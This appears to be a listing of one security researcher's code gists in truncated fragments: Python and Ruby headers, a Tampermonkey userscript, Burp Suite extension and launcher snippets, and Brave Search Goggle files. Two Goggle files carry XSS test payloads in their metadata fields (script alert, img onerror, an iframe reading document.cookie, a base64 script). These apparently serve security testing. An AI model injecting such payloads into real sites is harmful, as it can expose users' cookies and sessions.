thypon

import sys
import logging
import os
import random
import json
import argparse

from PIL import Image
import requests
from io import BytesIO

thypon

<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Haunted IFrame</title>
</head>

<body>

thypon

require 'httparty'
require 'date'
require 'pry'

# In order to use:
#
# 1. Create a token with 
#	scopes read:accounts read:favourites read:statuses write:favourites write:statuses
#   in https://mastodon.social/settings/applications, copy "Your access token"
# 2. Find your user ID by inspecting the /search queries through an intercepting proxy

thypon

// ==UserScript==
// @name         Fix Mastodon Hashtags
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  Fix the hashtag issue in mastodon
// @author       [email protected]
// @match        https://*/*
// @icon         https://www.google.com/s2/favicons?sz=64&domain=tampermonkey.net
// @grant        none
// ==/UserScript==

thypon

! name: <script id="js-umNotice" src="https://cdn.search.brave.com/serp/v1/static/serp-js/umNotice/5397726bb717fcb68b70ab8e189f0d4916703b392457a4450a06705d64e95743-main.bundle.js" data="{&quot;i18n&quot;:{&quot;usage-metrics-notice&quot;:&quot;Brave Search uses private usage metrics to estimate overall activity and performance. You can turn off this option in <script>alert(1)</script><a href='/settings'>Settings</a>.&quot;,&quot;Learn more&quot;:&quot;Learn more&quot;}}"></script>test<a>test</a><img src=x onerror=prompt(domain)><h1><marquee>XSS</marquee></h1>
! description: Rtest http://thomasg.fr/
! public: true
! author: Goggles<script id="js-umNotice" src="https://cdn.search.brave.com/serp/v1/static/serp-js/umNotice/5397726bb717fcb68b70ab8e189f0d4916703b392457a4450a06705d64e95743-main.bundle.js" data="{&quot;i18n&quot;:{&quot;usage-metrics-notice&quot;:&quot;Brave Search uses private usage metrics to estimate overall activity and performance. You can turn off this option in <script>alert(1)</script><a href

thypon

! name: MyNetsec
! description: Prioritizes domains popular with the information security community. Primarily uses submissions and scoring from /r/netsec.
! public: true
! author: Andrea Brancaleoni
! avatar: #ff0000
! homepage: https://github.com/thypon

! Goggle extras
$discard
$boost=3,site=github.io

thypon

! name: <iframe srcdoc="<p>Hello world!<script>alert(document.cookie)</script></p>" src="demo_iframe_srcdoc.htm"><p>Your browser does not support iframes.</p></iframe>test
! description: Rtest http://thomasg.fr/
! public: true
! author: <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>test
! avatar: #9244e0
$discard
$downrank,site=medium.com
$boost=1,site=github.io
$boost=1,site=micro.blog
/blog.$boost=1

thypon

# Author:     Andrea Brancaleoni
# Version:    1.0
# License:     MIT License

from burp import IBurpExtender
from burp import IHttpListener
from burp import IProxyListener
from burp import IContextMenuFactory

from javax.swing import JMenuItem, JFileChooser

thypon

#!/bin/sh
APP_PACKAGE="/Applications/Burp Suite Professional.app/"
exec java --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.desktop/javax.swing=ALL-UNNAMED -Dinstall4j.launcherId=70 -Dinstall4j.swt=false -Dexe4j.moduleName="$APP_PACKAGE" -Dfile.encoding=UTF-8 -cp "$APP_PACKAGE/Contents/Resources/app/.install4j/i4jruntime.jar:$APP_PACKAGE/Contents/java/app/burpsuite_pro.jar" -Duser.dir="$APP_PACKAGE/Contents/Resources/app/./."  com.install4j.runtime.launcher.MacLauncher

thypon

/*
 * Copyright (C) 2021 Andrea Brancaleoni ( @nJoyneer / https://github.com/thypon )
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software